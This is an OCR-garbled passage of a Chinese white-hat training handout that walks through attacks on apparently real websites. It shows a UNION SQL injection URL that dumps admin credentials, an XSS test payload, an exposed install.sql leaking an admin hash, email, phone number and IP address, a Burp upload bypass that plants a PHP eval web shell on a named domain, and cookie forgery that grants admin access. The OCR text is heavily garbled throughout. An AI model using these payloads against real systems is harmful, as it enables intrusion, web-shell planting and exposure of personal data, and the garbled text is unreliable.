接 下 来 我 们 查看 源码 目录 下 的 Databases/0791idc.mdb ， 知 道 了 News 表 一 共 
有 十 个 字段 。 
之 后 输 


^ ' and 1=2 union select 1,2,3,4,5,6,7,8,9,0 from admin where '1'z'- 
> RIL wa 219: 


€ - QC |D localhost/NewsType.asp?SmallClass=%27%20and%201 =2%20union%20select%201,2,3,4,5,6,7,8,9,0%20from%20adminY © 加 = 
=i 应 用 Qto-md = 实验 吧 Oishkiciz: Hj 至 爱 破解 & Google 翻译 O 其 他 书签 


javastr="" javastr-javastr*^ ”javastr=javastr+ " javastr-javastr*" 


” - " ^ ” m . "T [1900-1-7] ( a iro ) : 
| y javastr=javastr+ 图 2 javastr=javastr+ 





javastr-javastr*" 


~ JJ 








" document. write (javastr) 


之 后 就 很 简单 了 ， 我 们 先 看 看 admin € hg A P IZ de R A dp] IR o 11352 
替换 为 username ，9 替换 为 password 。 





E C ||3localhost/NewsType.asp?SmallClass-96279620and96201 =2%20union%20select%201,username, 3,4,5,6,7,8, password,0%2C 
=! 应 用 Qto-md = 实验 吧 Ô EKG BB See Dy Google Miz 





javastr=" javastr=javastr+”” javastr=javastr+ ' javastr-javastr*" 





[1900-1-7] (点 击 


”javastr=javastr+ [Sladmin “ javastr=javastr+” £3a976c77dc7264c) " 
javastr-javastr*" 








" document. write (javastr) 


然后 把 f3a976c77dc7264c 送 到 pmd5 AFH > ZARA 060618 -° 


之 后 可 以 从 /admin $ AE E > &3k3E EX € WebShell ° 


XSS 


实战 篇 南方 Oday 


我 们 点 击 网 站 右上 角 的 “联系 我 们 ”， 可 以 发 现 这 个 
页 面 中 也 出 现 了 这 四 个 字 。 





€ > C |B localhost/Aboutus.asp?Title=%C1%AA%CF%BS%CE%D2%C3%C7 
=I 应 用 @to-md = 实验 吧 Ô ij 春秋 论坛 图 至 爱 破解 B Google 翻译 


页 面 的 URL 中 出 现 了 这 四 个 字 ， 


7 & B4 5 


C3 其 他 书 和 








< 使 ”杭州 开 泰 生物 技术 有 限 公 


首页 | 企业 简介 | 新 闻 资 讯 | 产品 展示 | 下 载 中 心 | 


企业 邮局 联系 我 们 繁体 中 文 






3 


营销 网 络 | 


D 今天 是 116 年 12 月 26 日 星期 
ATRE | 客户 留言 | 会 员 中 心 | 














0 





D APSE 联系 我 们 







用 户 名 : admin 
登录 


新 用 户 注册 


标 州 开 泰 生物 技术 有 限 公司 


= | 电话: 0571-88169527 
清除 传真 : 0571-88169531 
忘记 密码 ? 地 址 : 村 州 市 种 州 街 银河 嘉 园 7 幢 402 


mann a r 


后 我 们 把 URL 中 的 Title 参数 改 成 1 











IR 


aN 


€ > t D localhost/Aboutus.asp?Title- | i 
i 应 用 e to-md se 实验 吧 Ô Ekibi B 至 爱 破解 & Google 翻译 





? 


d Gi: 
O 其 他 书 和 












Qe 杭州 开 泰 生物 技术 有 限 公 


首页 | 企业 简介 | 新 闻 资 讯 | 产品 展示 | 下 载 中 心 


企业 邮局 联系 我 们 繁体 中 文 






c) 


营销 网 络 | ATRE | 客户 留言 | 会 员 中 心 | 


D 今天 是 116 年 12 月 26 日 星期 一 











| 


这 就 提示 我 们 这 里 面 可 能 会 出 现 XSS ^ A17 
成 <script>alert(1)</script> 
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实战 篇 南方 Oday 


Y itr» 
Y«td height- 206" valign="top > 
Yctable width- 18005" border="6" cellspacing- 8" cellpadding="0"> 
¥ <tbody> 
Y ctr»? 
Y«td class- title right" height="32"> 
"&nbsp;&nbsp;&nbsp;" 
<img src= Images/smallbook.jpg width- 18" height- 18» 
"&nbsp;&nbsp;" 





script>alert(1)</script 
</td> 
</tr> 
</tbody> 
</table> 
<table width="100%" border-" 8" cellspacing- 8" cellpadding="0"> 
</table> 


我 们 看 到 源 代 码 中 出 现 了 这 个 东西 。 


MY 3K 


e ZWA}: 2.2 % Oday 
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实战 篇 余 闻 同学 录 


米 斯 特 白 帽 培训 讲义 实战 篇 余 闻 同 学 录 


讲师 : ghOstkey 
整理 : 飞龙 
Vx : CC BY-NC-SA 4.0 


占 点 搜索 
百度 关键 词 搜 索 : 


e 2016 余 闻 同学 录 v3.2 All Rights Reserved. 王者 - 余 闻 特别 鸣谢 似 水 4 a | 








— 同学 录 多 种 多 样 .看 我 们 的 影片 四 2016 余 闻 同学 录 v3.2 All Rights Reserved. ES 
^ gop teasing 





: AIRE HO 2016 余 闻 同学 录 v3.2 All Rights Reserved .王者 
Ec: 特别 鸣谢 似 水 全 体 程序 员 提供 的 原 程序 、 
visionxk.com/ ~ - 百度 快照 - 评价 





新 的 网 络 时 代 — AHARI RO 2016 余 闻 同学 录 v3.2 All Rights Reserved. +S 
IB) 特别 鸣谢 似 水 全 体 程序 提供 的 原 程序 .. 
www.visionxk.com/ ~ - &BIETRES - 评价 
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实战 篇 余 闻 同学 录 


产 码 下 载 


http://download.csdn.net/download/u012513463/9701150 
目录 结构 是 这 样 的 : 


|) admin 2016/11/29 21:00 ”文件 去 
|) assets 2016/11/29 20:50 ”文件 去 
di css 2016/11/29 20:50 ”文件 去 
|) home 2016/11/29 20:51 ”文件 去 
|. img 2016/11/29 20:51 ”文件 去 
Ji indexs 2016/11/29 20:51 ”文件 去 
|. install 2016/11/29 20:51 ”文件 去 
di is 2016/11/29 20:51 ”文件 去 
|. libs 2016/11/29 20:51 ”文件 去 
|) music 2016/11/29 20:50 ”文件 去 
di n 2016/11/29 20:50 ”文件 去 
|. photos 2016/11/29 20:50 ”文件 去 
出 style 2016/11/29 20:50 ”文件 去 
Ji syys 2016/11/29 20:50 ”文件 去 
4) azcommon.php 2016/11/24 21:32 PHP 344 2 KB 
|$| code.php 2016/11/24 21:32 PHP xc 3 KB 
a | code.ttf 2016/11/24 21:32 TrueType 字体 文件 23 KB 
|$| common.php 2016/11/24 21:32 PHP 344 1 KB 
i$ | index.php 2016/11/24 21:32 PHP xc 1 KB 
i| indexl.php 2016/11/24 21:32 PHP 344 9 KB 
i$| login.php 2016/11/24 21:32 PHP 文件 6 KB 
时 | logout.php 2016/11/24 21:32 PHP xc 1 KB 
|$| music.php 2016/11/24 21:32 PHP xc 4 KB 
|. readme.txt 2016/11/24 21:32 WAHE 2 KB 
时 | reg.php 2016/11/24 21:32 PHP 文件 6 KB 


安装 之 后 会 弹出 以 下 界面 : 


EEA 80 条 数据 成 功 :80 条 先 败 :0 条 
管理 员 账 号 admin， 密 码 123456， 请 尽快 修改 密码 。 


WE ES Wl 
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44 Fo 54 AGA admin:123456 ° 








ve 收 项 夫 4i ez sql core.php 修改 日 期 : 2016/11/24 21:32 
B 下 载 — CWM8SPAdministrator Desktop iB \libs 大 小 : 14.0 KB 
= s a * sgl mysql.php 修改 日 期 : 2016/11/24 21:32 
1 最 所 方 问 的 位 置 CA\ 用 户 \Administratom\Desktop\ 祭 闻 同 学 录 \libs 六 小 : 7.19 KB 
2 install.sql 修改 日 期: 2016/11/24 21:32 
ak CMBPMAdministrato Desktop V ṣa install 大 小 : 7.21 KB 
关 PPTV 视 频 Se . 
Bas simditor.js 修改 日 期 : 2016/11/24 21:32 
my CABPMAdministratoDesktop V RiBISISEsWpluginsMsi.. žb: 157 KB 
文档 simditor.js (SRG RB: 2016/11/24 21:32 
g RETE CMBPMAdministratorDesktop VES E xVassetsysWplu.. Ass 157 KB 
d EF 在 以 下 内 容 中 再 次 搜索 : 
St 顺 计 算 机 F SEx. Æ Internet 
S 计算 机 
& System (C:) 
Cs Info (D:) 


cx OTHER (E) 


看 到 了 /install/install/sql 文件 。 我 们 随便 找 个 站 点 试验 一 下 : 


图 Load URL  http;//txhlesk.com//install/install.sql 
Q Split URL 
2) Execute 





[^] Enable Post data | | Enable Referrer 


T 当前 网 页 的 滞 言 为 英文 ssssERGU) NE c7s* aay 
PRIMARY KEY ( uid ) 
) ENGINE=MyISAM DEFAULT CHARSET=utf8; 
DROP TABLE IF EXISTS 'ssnh webconfigs ; 
CREATE TABLE ssnh_webconfigs ( 
‘vkey varchar (255) NOT NULL, 
“value text, 
PRIMARY KEY ( vkey ) 
) ENGINE=MyISAM DEFAULT CHARSET-utf8; 
INSERT INTO ssnh_users (uid, user, daili, vip, vipstart ， vipend, rmb, peie, pwd, sid, active, fuzhan, login, mail, qq, phone, city, 
‘regip, lastip, regtime , lasttime , ah, zz, lxdh, tc, xz, sr, xm, ch, xb, xh, zw, ktc, gxqm, tj, xtj ) VALUES 
(1, 'admin', 0, 1, NULL, '2020-12-30', 9999, 127, '4d3ea8f0dlaa6fa07b6c0a5375645c48', ' 0b484609853c ®cd87c8dle3b2f5f34a' , 9, 1, 1, '3512447166qq.com , '351244716', 
'15051619380', NULL, NULL, '111.121.85.149', NULL, '2016-05-02 20:21:47, '$EJLTE , MEKKE , ° 15051619380", 'IT', '$8EEREE 9", '3389319k9", “Init . odi 
"7, Ir, Wk C. BMRB SRST’, wBeckisSlEbEHENUSGBe€IXENEBESe', i£|sBeme,'1) 
INSJRT INTO 'ssnh webconfigs VALUES ('cronrand', '1234'); 


是 可 以 访问 的 。 











KF EN 


进入 后 台 ， 有 两 个 上 传 点 : 界面 管理 和 相册 管理 : 
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我 们 挑选 相册 管理 来 演示 。 首 先 随 便 上 传 一 个 PHP 文件 : 





相册 列表 


相册 列表 


#PID 


ES DU > » 


lapplication/octet-stream 


地 址 


实战 篇 余 闻 同学 录 


显示 "文件 类 型 不 符 "， 然 后 显示 了 文件 的 类 型 。 我 们 的 猜测 程序 根据 类 型 来 判断 ， 


而 前 面 说 过 类 型 是 可 以 随便 修改 的 〈 见 “文件 上 传 ” 一 草 ) 。 我 们 用 Burp 抓 取 
求 ， 把 类 型 改 为 image/jpg ， 然 后 放行 。 


Comment this item 


POST /admin/xcgl.php HTTP/1.1 

Host: visionxk.com 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/4S.0 
Accept: text/html,application/xhtmltxml,application/xml;q-0.9,*/*;q-0.8 
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 

Accept-Encoding: gzip, deflate 

Referer: http://visionxk.com/admin/xcgl.php 

Cookie: BAEID=CFOECADSCLSAS31CDASC1143F4C3AD83; PHPSESSID-3p130m5alcntf69g3dhbh0pj05; klsf sid-88506afS40cfS0d7b5ad2b51e9530e9$5; 
.gazGA1.2.210282433.1480437413; myhk player=no; myhk player show-yes 

Connection: close 

Upgrade-Insecure-Requests: 1 

‘Content-Type: multipart/form-data; boundarys--------------------------- 90291117417114 
Content-Length: 326 


90291117417114 
Content-Disposition: form-data; name-"do" 


90291117417114 
Content-Disposition: form-data; name="upfile"; filename="key.php" 
Content-Type: image/jpg 


<?php Gevalí(? POST[key]);?» 
90291117417114-- | 


=I) ee 
我 们 可 以 看 到 上 传 成 功 : 


rr 


1x 


个 请 
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相册 列表 
相册 列表 


#PID 目录 地 址 


已 径 成 功 上 传 

文件 名 :/ .Jphotos/1480440169.php 
mE: KE: 

大 小 :27 bytes 

EH: 


然后 我 们 用 菜刀 连接 一 下 ， 注 意 文件 名 称 前 面 有 两 个 点 ， 表 示 上 级 目录 ， 所 以 夏 实 
1$ x /photos/1480440169. php 





visionxk. com/photos// 1480440189. php 


备注 : | 
[Typel v | [PHP val) v | [682312 | | 
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(CJ vi si onxk. com 





(C3 /home/bae/ app/photos/ v | 读 取 星期 二 2016-11-30 十 一 月 初 二 
111. 13. 105. 49 目录 ©), 文件 65) 大 小 ' 日 [c] 站 点 类 别 
器 “< / 14661828430 ine 0168-11-24 10:24:02 39014 )7TTT = 默认 类 别 
日 局 home ioi ai - massi disco m E aR 
a Ca = 466150503. Jpg 2015-11-24 02 ITTI Dx] 日 程 提 醒 
日 G app ip, 2016-11-24 24:02 T 


omm 





我 们 下 面 来 看 看 源码 ， /home/xcgl.php # 47 fT: 


// 上 传 文件 类 型 列表 

$uptypes-array( 
'image/jpg', 
‘image/jpeg', 
‘'image/png', 
‘image/pjpeg', 
‘image/gif', 
‘image/bmp', 
'image/x-png' 


); 


RM AERA RR AEP A? 221 47: 


if(!in_array($file["type"], $uptypes) ) 
// 检 得 文件 类 型 
{ 
echo "X# RAKHI". file["type"]; 
exit; 


它 对 文件 类 型 进行 了 校 验 ， 但 除 此 之 外 没有 别 的 校 验 了 ， 所 以 这 里 存在 文件 上 传 漏 


NI 一 
yie Oo 


KMAT B PAIS UHL 实战 篇 迅雷 CMS 


讲师 : ghOstkey 
整理 : 飞龙 
协议 : CC BY-NC-SA 4.0 


站 点 搜索 

KEV] > intext:" 技 术 支 持 : 银 川 迅 雷 网 络 公 司 " 

另外 这 个 CMS 是 财源 的 ， 没 有 找到 源码 。 

Cookie 伪造 

起 因 是 这 样 ， 我 们 随便 找 了 一 个 网 站 ， 访 问 后 侣 登录 页 面 


( /admin/login.asp ) > A1% M 3 %4 admin:admin 进 了 后 台 
( /admin/index.asp ) ， 发 现 Cookie 有 这 样 一 个 东西 : 


LI LUURIT? 7 ANLUBSBRN Y A | IRS CVVAIC jJ 到 
名 称 "| 内 容 | 域 | 原始 大 小 Be 
由 cmsname 3d www.ycmhdl.com 12B / 
* cmsid www. ycmhdl.com 6B / 
* ASPSESSIONIDCCSDBSTD BEFNKMACHFMNOFKAEOKKA www.ycmhdl.com 44B / 


我 们 可 以 看 到 ， 用 户 名 称 和 ID 是 明文 保存 的 。 我 们 猜测 ， 程 友 根 据 Cookie 中 的 值 
来 判断 当前 登录 用 户 。 于 是 我 们 把 其 中 一 个 删 掉 ， 结 果 退 出 登录 。 再 次 访问 后 台 时 
返回 到 了 登录 页 面 。 








ig Load URL http://www.ycmhdl.com/admin/login.asp?action-logout 
A Split URL 
|^ Execute 
| | Enable Post data [| | Enable Referrer 
APR: 
» 
密 B 
验证 码 : 7722 
ee 
e dp 《 s. MN 控制 人 台 HTML css MA DOM 网络 Cookies v P E Cookies BEREE 


lë Cookies - 过 滤器 - 默认 (接受 第 二 方 cookie ) ~ 
| 名称 —— ‘| ae | sg | 原始 大 小 Be 
! N / 

/ 

/ 





| cmsname www. ycmhdl.com 7B 
* cmsid www. ycmhdl.com 5B 
* ASPSESSIONIDCCSDBSTD BEFNKMACHFMNOFKAEOKKA www.ycmhdl.com 44B 
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这 就 说 明 它 的 确 使 用 Cookie 中 的 值 来 判断 。 我 们 再 进行 试验 ， 将 Cookie 的 两 个 值 
重新 设置 ， 之 后 直接 访问 /admin/index.asp 


引 Load URL | 
w Split URL | 
Execute 


[7] Enable Post data | | Enable Referrer 














欢迎 你 ，[ 系 统管 理 员 RSS | BEF | 管理 首页 | 退出 


服务 器 类 型 (1P:192.168.0.10) 腊 本 解释 引擎 : VBScript/5.8.18523 
站 点 物理 路 径 : EWhosti146164306d47 15fc29b6a21c52436ef1Whttpdocs! 服务 器 名 : wwwycmhdlcom 
FSO 文 本 读 写 : V 数据 库 使 用 : \ 

当前 版 本 : 迅雷 网 络 CMSV1.0 fe “者 : 银川 退 雷 网 络 公司 




















* dy < > = pa HTML css Bk DOM 网 络 [e | P & Cookies TRAIRE ^ v BBE 
i$ Cookies ~ ities - 上 默认 (接受 第 二 方 cookie ) ~ 

cmsname admin www. ycmhdl.com 12B / 2s 

cmsid 1 www. yomhdl.com 6B / 会 活 

由 ASPSESSIONIDCCSDBSTD OBEFNKMACHFMNOFKAEOKKAOO www.yomhdl.com 44B / 会 话 


成 功 进 入 后 台 。 
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